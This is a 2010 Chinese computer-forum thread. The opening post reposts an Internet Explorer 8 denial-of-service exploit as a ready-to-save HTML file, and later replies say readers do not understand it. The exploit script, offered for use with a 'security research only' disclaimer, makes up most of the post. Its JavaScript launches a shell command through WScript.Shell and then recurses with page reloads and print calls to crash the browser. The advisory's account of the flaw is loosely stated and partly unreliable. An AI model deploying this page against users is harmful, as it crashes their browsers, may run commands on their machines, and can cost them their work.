电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

新年,好东西大家分享。刚刚拿到的。同时请IE8用户注意。

   关闭 [复制链接]
bek 发表于 2010-2-16 02:42:52 | 显示全部楼层 |阅读模式
本帖最后由 bek 于 2010-2-16 02:46 编辑

  1. =======================================================================

  2.                       Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit =======================================================================

  3. # code by Asheesh kumar Mani Tripathi

  4. # email informationhacker08@gmail.com

  5. # company       aksitservices

  6. # Credit by Asheesh Anaconda


  7. #Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
  8. #Greets to Bhudeo Prasad for making shell script :)


  9. #Background

  10. Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

  11. #Vulnerability
  12. This bug is a typical result of multitudinous  loop.
  13. The flaw exists within "history go" ActiveX control which contains
  14. stack based overflow conditions.User interaction is required to
  15. exploit this vulnerability in that the target must visit a malicious
  16. web page.


  17. #Impact

  18. Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
  19. your system unaccessible,your work if any   might be lost

  20. #Proof of concept
  21. copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

  22. ========================================================================================================================

  23.                                                            asheesh.html
  24. ========================================================================================================================
  25. <html>
  26. <title>asheesh kumar mani tripathi</title>

  27. <head>
  28. <script type="text/javascript">
  29. function sucks()
  30. {

  31. var shell=new ActiveXObject("WScript.Shell");
  32. shell.Run("ipconfig", 1);

  33. }

  34. function asheesh()
  35. {
  36. sucks();
  37. window.onerror=new Function("history.go(0)");
  38. window.print();
  39. asheesh();


  40. }
  41. asheesh();
  42. </script>
  43. </head>
  44. <body onLoad="asheesh()"></body>

  45. </html>


  46. ========================================================================================================================




  47. #刚刚拿到的。和大家分享。(方法)可能带有攻击性,仅供安全研究之用,风险自负!
复制代码
l6688 发表于 2010-3-23 16:48:33 | 显示全部楼层
什么东西哦?????

看不明白
souona 发表于 2010-4-12 11:35:56 | 显示全部楼层
好东西。。。厉害厉害
孤叶飘翎 发表于 2010-5-14 14:04:09 | 显示全部楼层
一头雾水。不明白。
good_0006 发表于 2010-6-21 12:46:04 | 显示全部楼层
不懂,请高人批讲!{:3_237:}
ektha4683 发表于 2011-6-24 21:25:24 | 显示全部楼层
LZ是否应当给我们解释一下 看不明白
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 05:57

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表